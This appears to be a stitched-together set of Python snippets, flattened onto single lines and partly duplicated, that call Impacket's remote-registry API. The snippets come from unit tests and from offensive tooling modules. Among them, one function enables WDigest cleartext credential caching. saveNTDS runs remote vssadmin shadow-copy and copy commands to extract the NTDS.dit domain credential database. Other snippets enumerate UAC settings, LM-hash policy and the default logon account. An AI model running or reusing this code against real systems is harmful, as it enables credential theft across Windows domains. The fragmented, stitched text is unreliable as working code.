def getDefaultLoginAccount(self): try: ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon') keyHandle = ans['phkResult'] dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultUserName') username = dataValue[:-1] dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DefaultDomainName') domain = dataValue[:-1] rrp.hBaseRegCloseKey(self.__rrp, keyHandle) if len(domain) > 0: return '%s\\%s' % (domain,username) else: return username except: return None
def test_hBaseRegQueryValue(self): dce, rpctransport, phKey = self.connect() resp = rrp.hBaseRegOpenKey(dce, phKey, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\x00' ) resp.dump() resp = rrp.hBaseRegQueryValue(dce, resp['phkResult'], 'ProductName\x00')
def disable(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() self.rrp = remoteOps._RemoteOperations__rrp if self.rrp is not None: ans = rrp.hOpenLocalMachine(self.rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] try: rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00') except: self.logger.success('UseLogonCredential registry key not present') try: remoteOps.finish() except: pass return try: #Check to make sure the reg key is actually deleted rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') except DCERPCException: self.logger.success('UseLogonCredential registry key deleted successfully') try: remoteOps.finish() except: pass
def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception as e: print e type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue( 'HOLA COMO TE VA\x00' == data )
def query(self, dce, keyName): # Let's strip the root key try: rootKey = keyName.split('\\')[0] subKey = '\\'.join(keyName.split('\\')[1:]) except Exception: raise Exception('Error parsing keyName %s' % keyName) if rootKey.upper() == 'HKLM': ans = rrp.hOpenLocalMachine(dce) elif rootKey.upper() == 'HKU': ans = rrp.hOpenCurrentUser(dce) elif rootKey.upper() == 'HKCR': ans = rrp.hOpenClassesRoot(dce) else: raise Exception('Invalid root key %s ' % rootKey) hRootKey = ans['phKey'] ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey, samDesired=rrp.MAXIMUM_ALLOWED | rrp.KEY_ENUMERATE_SUB_KEYS | rrp.KEY_QUERY_VALUE) if self.__options.v: print keyName value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], self.__options.v) print '\t' + self.__options.v + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1]) elif self.__options.ve: print keyName value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '') print '\t' + '(Default)' + '\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\t', str(value[1]) elif self.__options.s: self.__print_all_subkeys_and_entries(dce, subKey + '\\', ans2['phkResult'], 0) else: print keyName self.__print_key_values(dce, ans2['phkResult']) i = 0 while True: try: key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i) print keyName + '\\' + key['lpNameOut'][:-1] i += 1 except Exception: break
def saveNTDS(self): logging.info('Searching for NTDS.dit') # First of all, let's try to read the target NTDS.dit registry entry ans = rrp.hOpenLocalMachine(self.__rrp) regHandle = ans['phKey'] try: ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters') keyHandle = ans['phkResult'] except: # Can't open the registry path, assuming no NTDS on the other end return None try: dataType, dataValue = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'DSA Database file') ntdsLocation = dataValue[:-1] ntdsDrive = ntdsLocation[:2] except: # Can't open the registry path, assuming no NTDS on the other end return None rrp.hBaseRegCloseKey(self.__rrp, keyHandle) rrp.hBaseRegCloseKey(self.__rrp, regHandle) logging.info('Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation) # Get the list of remote shadows shadow, shadowFor = self.__getLastVSS() if shadow == '' or (shadow != '' and shadowFor != ntdsDrive): # No shadow, create one self.__executeRemote('%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive) shadow, shadowFor = self.__getLastVSS() shouldRemove = True if shadow == '': raise Exception('Could not get a VSS') else: shouldRemove = False # Now copy the ntds.dit to the temp directory tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp' self.__executeRemote('%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName)) if shouldRemove is True: self.__executeRemote('%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive) self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output') remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName) return remoteFileName
def enum(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System') keyHandle = ans['phkResult'] dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA') self.logger.success("Enumerating UAC status") if uac_value == 1: self.logger.highlight('1 - UAC Enabled') elif uac_value == 0: self.logger.highlight('0 - UAC Disabled') rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) remoteOps.finish()
def on_admin_login(self, context, connection): remoteOps = RemoteOperations(connection.conn, False) remoteOps.enableRegistry() ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System') keyHandle = ans['phkResult'] dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA') if uac_value == 1: context.log.highlight('UAC Status: 1 (UAC Enabled)') elif uac_value == 0: context.log.highlight('UAC Status: 0 (UAC Disabled)') rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) remoteOps.finish()
def run(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System') keyHandle = ans['phkResult'] dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'EnableLUA') print_succ("{} UAC status:".format(self.peer)) if uac_value == 1: print_att('1 - UAC Enabled') elif uac_value == 0: print_att('0 - UAC Disabled') rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle) remoteOps.finish()
def checkNoLMHashPolicy(self): logging.debug('Checking NoLMHash Policy') ans = rrp.hOpenLocalMachine(self.__rrp) self.__regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa') keyHandle = ans['phkResult'] try: dataType, noLMHash = rrp.hBaseRegQueryValue(self.__rrp, keyHandle, 'NoLmHash') except: noLMHash = 0 if noLMHash != 1: logging.debug('LMHashes are being stored') return False logging.debug('LMHashes are NOT being stored') return True
def wdigest_enable(self, context, smbconnection): remoteOps = RemoteOperations(smbconnection, False) remoteOps.enableRegistry() if remoteOps._RemoteOperations__rrp: ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: context.log.success('UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def enable(self): remoteOps = RemoteOperations(self.smbconnection, self.doKerb) remoteOps.enableRegistry() self.rrp = remoteOps._RemoteOperations__rrp if self.rrp is not None: ans = rrp.hOpenLocalMachine(self.rrp) regHandle = ans['phKey'] ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00') rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') if int(data) == 1: self.logger.success('UseLogonCredential registry key created successfully') try: remoteOps.finish() except: pass
def saveNTDS(self): logging.info('Searching for NTDS.dit') # First of all, let's try to read the target NTDS.dit registry entry ans = rrp.hOpenLocalMachine(self.__rrp) regHandle = ans['phKey'] try: ans = rrp.hBaseRegOpenKey( self.__rrp, self.__regHandle, 'SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters') keyHandle = ans['phkResult'] except: # Can't open the registry path, assuming no NTDS on the other end return None try: dataType, dataValue = rrp.hBaseRegQueryValue( self.__rrp, keyHandle, 'DSA Database file') ntdsLocation = dataValue[:-1] ntdsDrive = ntdsLocation[:2] except: # Can't open the registry path, assuming no NTDS on the other end return None rrp.hBaseRegCloseKey(self.__rrp, keyHandle) rrp.hBaseRegCloseKey(self.__rrp, regHandle) logging.info( 'Registry says NTDS.dit is at %s. Calling vssadmin to get a copy. This might take some time' % ntdsLocation) # Get the list of remote shadows shadow, shadowFor = self.__getLastVSS() if shadow == '' or (shadow != '' and shadowFor != ntdsDrive): # No shadow, create one self.__executeRemote( '%%COMSPEC%% /C vssadmin create shadow /For=%s' % ntdsDrive) shadow, shadowFor = self.__getLastVSS() shouldRemove = True if shadow == '': raise Exception('Could not get a VSS') else: shouldRemove = False # Now copy the ntds.dit to the temp directory tmpFileName = ''.join( [random.choice(string.letters) for _ in range(8)]) + '.tmp' self.__executeRemote( '%%COMSPEC%% /C copy %s%s %%SYSTEMROOT%%\\Temp\\%s' % (shadow, ntdsLocation[2:], tmpFileName)) if shouldRemove is True: self.__executeRemote( '%%COMSPEC%% /C vssadmin delete shadows /For=%s /Quiet' % ntdsDrive) self.__smbConnection.deleteFile('ADMIN$', 'Temp\\__output') remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName) return remoteFileName
class RRPTests(unittest.TestCase): def connect(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) dce.connect() dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts) resp = rrp.hOpenLocalMachine( dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS) return dce, rpctransport, resp['phKey'] def test_OpenClassesRoot(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenClassesRoot() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenCurrentUser(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenCurrentUser() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenLocalMachine(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenLocalMachine() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenPerformanceData(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenPerformanceData() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenUsers(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenUsers() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_BaseRegCloseKey(self): dce, rpctransport, phKey = self.connect() request = rrp.BaseRegCloseKey() request['hKey'] = phKey resp = dce.request(request) resp.dump() def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception, e: print e type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue('HOLA COMO TE VA\x00' == data)
def checkUAC(self, dce): # try: ans = rrp.hOpenLocalMachine(dce) regHandle = ans['phKey'] except Exception as e: logging.debug('Exception thrown when hOpenLocalMachine: %s', str(e)) return self.logger.highlight('UAC Status:') try: resp = rrp.hBaseRegOpenKey( dce, regHandle, 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' ) keyHandle = resp['phkResult'] except Exception as e: logging.debug('Exception thrown when hBaseRegOpenKey: %s', str(e)) return #EnableLUA try: dataType, lua_uac_value = rrp.hBaseRegQueryValue( dce, keyHandle, 'EnableLUA') except Exception as e: logging.debug('Exception thrown when hBaseRegQueryValue: %s', str(e)) lua_uac_value = 3 pass #LocalAccountTokenFilterPolicy try: dataType, latfp_uac_value = rrp.hBaseRegQueryValue( dce, keyHandle, 'LocalAccountTokenFilterPolicy') except Exception as e: logging.debug('Exception thrown when hBaseRegQueryValue: %s', str(e)) latfp_uac_value = 3 pass #LocalAccountTokenFilterPolicy try: dataType, fat_uac_value = rrp.hBaseRegQueryValue( dce, keyHandle, 'FilterAdministratorToken') except Exception as e: logging.debug('Exception thrown when hBaseRegQueryValue: %s', str(e)) fat_uac_value = 3 pass #Results if lua_uac_value == 1: self.logger.highlight(' enableLua = 1 (default) ') elif lua_uac_value == 0: self.logger.highlight(' enableLua = 0') else: self.logger.highlight(' enableLua key does not exist!') if latfp_uac_value == 1: self.logger.highlight(' LocalAccountTokenFilterPolicy = 1') elif latfp_uac_value == 0: self.logger.highlight( ' LocalAccountTokenFilterPolicy = 0 (default)') else: self.logger.highlight( ' LocalAccountTokenFilterPolicy key does not exist!') if fat_uac_value == 1: self.logger.highlight(' FilterAdministratorToken = 1 ') elif fat_uac_value == 0: self.logger.highlight(' FilterAdministratorToken = 0 (default)') else: self.logger.highlight( ' FilterAdministratorToken key does not exist!') # Analysis self.logger.highlight('') self.logger.highlight('UAC Analysis:') if lua_uac_value == 1: self.logger.highlight( 'EnableLUA current setting means capabilities are determined by' ) self.logger.highlight( ' LocalAccountTokenFilterPolicy and/or FilterAdministratorToken' ) self.logger.highlight('') elif lua_uac_value == 0: self.logger.highlight( 'High integrity access available to any member of the local admins group' ) self.logger.highlight( ' using plaintext credentials or password hashes!') return if latfp_uac_value == 1: self.logger.highlight( 'LocalAccountTokenFilterPolicy configured to allow remote connections with high integrity access tokens!' ) return else: self.logger.highlight( 'LocalAccountTokenFilterPolicy set to 0 tells us:') self.logger.highlight( ' High integrity access only possible using either the plaintext pass' ) self.logger.highlight( ' or password hash of the RID 500 local administrator') self.logger.highlight('') if fat_uac_value == 1: self.logger.highlight( 'FilterAdministratorToken set to 1 tells us High integrity access not available for RID 500 local administrator' ) else: # 0 or missing self.logger.highlight( 'The FilterAdministratorToken setting should have no effect in this case' )
class RRPTests(unittest.TestCase): def connect_scmr(self): rpctransport = transport.DCERPCTransportFactory( r'ncacn_np:%s[\pipe\svcctl]' % self.machine) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() # dce.set_max_fragment_size(32) dce.connect() dce.bind(scmr.MSRPC_UUID_SCMR) lpMachineName = 'DUMMY\x00' lpDatabaseName = 'ServicesActive\x00' desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \ scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | \ scmr.SERVICE_ENUMERATE_DEPENDENTS | scmr.SC_MANAGER_ENUMERATE_SERVICE resp = scmr.hROpenSCManagerW(dce, lpMachineName, lpDatabaseName, desiredAccess) scHandle = resp['lpScHandle'] return dce, rpctransport, scHandle def connect(self): if self.rrpStarted is not True: dce, rpctransport, scHandle = self.connect_scmr() desiredAccess = scmr.SERVICE_START | scmr.SERVICE_STOP | scmr.SERVICE_CHANGE_CONFIG | \ scmr.SERVICE_QUERY_CONFIG | scmr.SERVICE_QUERY_STATUS | scmr.SERVICE_ENUMERATE_DEPENDENTS resp = scmr.hROpenServiceW(dce, scHandle, 'RemoteRegistry\x00', desiredAccess) resp.dump() serviceHandle = resp['lpServiceHandle'] try: resp = scmr.hRStartServiceW(dce, serviceHandle) except Exception as e: if str(e).find('ERROR_SERVICE_ALREADY_RUNNING') >= 0: pass else: raise resp = scmr.hRCloseServiceHandle(dce, scHandle) self.rrpStarted = True rpctransport = transport.DCERPCTransportFactory(self.stringBinding) if len(self.hashes) > 0: lmhash, nthash = self.hashes.split(':') else: lmhash = '' nthash = '' if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) dce.connect() dce.bind(rrp.MSRPC_UUID_RRP, transfer_syntax=self.ts) resp = rrp.hOpenLocalMachine( dce, MAXIMUM_ALLOWED | rrp.KEY_WOW64_32KEY | rrp.KEY_ENUMERATE_SUB_KEYS) return dce, rpctransport, resp['phKey'] def test_OpenClassesRoot(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenClassesRoot() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenCurrentUser(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenCurrentUser() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenLocalMachine(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenLocalMachine() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenPerformanceData(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenPerformanceData() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_OpenUsers(self): dce, rpctransport, phKey = self.connect() request = rrp.OpenUsers() request['ServerName'] = NULL request['samDesired'] = MAXIMUM_ALLOWED resp = dce.request(request) resp.dump() def test_BaseRegCloseKey(self): dce, rpctransport, phKey = self.connect() request = rrp.BaseRegCloseKey() request['hKey'] = phKey resp = dce.request(request) resp.dump() def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self): dce, rpctransport, phKey = self.connect() resp = rrp.hOpenClassesRoot(dce) resp.dump() regHandle = resp['phKey'] resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00') resp.dump() phKey = resp['phkResult'] try: resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ, 'HOLA COMO TE VA\x00') resp.dump() except Exception, e: print e type, data = rrp.hBaseRegQueryValue(dce, phKey, 'BETO2\x00') #print data resp = rrp.hBaseRegDeleteValue(dce, phKey, 'BETO2\x00') resp.dump() resp = rrp.hBaseRegDeleteKey(dce, regHandle, 'BETO\x00') resp.dump() self.assertTrue('HOLA COMO TE VA\x00' == data)